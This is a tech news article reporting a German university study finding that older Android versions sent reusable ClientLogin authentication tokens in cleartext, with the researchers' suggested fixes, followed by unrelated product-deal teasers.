Skip to main content

Nearly all Android phones ‘leak’ sensitive personal data, tests show

Google Android LogoGoogle’s privacy woes just got worse. According to a study by researchers at a German university, more than 99 percent of all smartphones that run Google‘s Android operating system can easily be infiltrated by mobile hackers. The attackers can then use the “leaked” data to impersonate the rightful user, and access online accounts, such as Google Calendar, Twitter and Facebook.

According to the University of Ulm researchers, Bastian Konings, Jens Nickels, and Florian Schaub, the Android vulnerability is due to an improper implementation of the ClientLogin protocol, which is used in Android versions 2.3.3 and earlier, reports The Register. Once a user submits his or her login information, ClientLogin receives an authentication token that is sent as a cleartext file. Because the authentication token (authToken) can be used repeatedly for up to 14 days, hackers can access the information stored in the file, and use it to do their nefarious bidding.

Recommended Videos

“We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis,” write the researchers on their blog. “The short answer is: Yes, it is possible, and it is quite easy to do so. Further, the attack is not limited to Google Calendar and Contacts, but is theoretically feasible with all Google services using the ClientLogin authentication protocol for access to its data APIs.”

As bad as this sounds — indeed, is — for Android users, this type of attack can only be waged when the Android device is using an unsecured network, like a Wi-Fi hotspot, to send data. The researchers say hackers could wage such an attack when a device is connected to a network that is under their control.

“To collect such authTokens on a large scale an adversary could setup a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks,” write the researchers. “With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing.”

The researchers suggest a number of ways to fix the issue, for app developers, Google and Android users alike. Developers whose apps use ClientLogin “should immediately switch to https,” the researchers say. And Google should limit the life of the authentication token, and restrict automatic connects to protected networks only. Android users should update their devices to 2.3.4 as soon as possible, they say, as well as turn off automatic sync when connecting with Wi-Fi, or avoid unsecured Wi-Fi networks entirely.

Andrew Couts
Former Digital Trends Contributor
Features Editor for Digital Trends, Andrew Couts covers a wide swath of consumer technology topics, with particular focus on…
Get the Samsung Galaxy S24 Ultra while it’s $350 off, but act fast!
The Samsung Galaxy S24 Ultra's camera.

When it comes to Samsung Galaxy deals, we’re always on the lookout for discounts and promotions for smartphones and tablets. That’s how we came across this fantastic offer on the Samsung Galaxy S24 Ultra: Right now, when you order the unlocked 256GB version of the phone at Best Buy, you’ll only pay $950. At full price, this model sells for $1,300. We tested this phone a while ago, and reviewers Andy Boxall and Christine Romero-Chan had the following to say: “The Samsung Galaxy S24 Ultra is one of the most complete, most capable, and most creatively versatile smartphones we've ever used.” The S24 even appears in our list of the best phones of 2024.

And if you’re looking for a different brand of phone entirely, our list of the best phone deals features top discounts on everything from iPhones and Samsung Galaxy devices to Google Pixel and OnePlus.

Read more
How to move your Twitter/X follows to Bluesky
Launch screen of Bluesky on an iPhone.

Bluesky has ascended in popularity, gaining over 20 million users in the past month. The influx of new users come mostly from X (formerly Twitter), in the wake of Donald Trump's reelection and a series of controversial changes made by Elon Musk.

If you're looking to leave X, then one of the things holding you back is the idea of losing your precious follows and followers. After all, most users have built up relationships and don't want to lose them. If this is you, you're probably wondering how you can migrate your Twitter followers and follows to Bluesky without losing them. Luckily, we have a solution to that problem — whether you have already deleted your X account or still have it up and running.

Read more
Garmin’s Apple Watch Ultra competitor has a $250 discount today
The Garmin Fenix 7X smartwatch with stats on the screen.

Now that Black Friday and Cyber Monday are behind us, we can start refocusing on the deals and discounts that matter most to us (instead of every deal all at once). And if you’ve been shopping around for smartwatch deals, the following offer may be of interest to you: For a limited time, when you purchase the Garmin Fenix 7X Pro (with 51mm band) directly through Amazon or Garmin, you’ll only pay $750. At full price, this model sells for $1,000. The Garmin Fenix 8 is out already, but if you don't mind having an older model, this deal saves you a nice chunk of change.

Why you should buy the Garmin Fenix 7X Pro
Whether you’re looking for a digital companion to track vitals on your daily jog or you’ve been looking for a way to get more exercise inspiration in general, the Fenix 7X Pro is a great way to jumpstart and maintain a healthier lifestyle. With its 1.4-inch sapphire solar-charged display and 51mm polymer case with a titanium bezel and rear cover, the 7X Pro looks fantastic, is tough as nails, and has a number of intuitive buttons and touchscreen controls.

Read more